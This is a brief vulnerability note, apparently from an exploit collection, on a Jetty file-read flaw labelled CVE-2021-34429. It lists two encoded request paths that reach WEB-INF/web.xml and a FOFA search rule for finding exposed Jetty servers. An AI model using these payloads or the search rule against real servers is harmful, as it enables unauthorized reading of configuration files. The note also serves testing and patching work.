2021-08-04 20:43:19 +08:00
..
2021-08-04 20:43:19 +08:00

Jetty File Read (CVE-2021-34429)

/%u002e/WEB-INF/web.xml and /.%00/WEB-INF/web.xml After normalization and decoding, it will become /./WEB-INF/web.xml.

FOFA query rule: app="Jetty"

Demo

img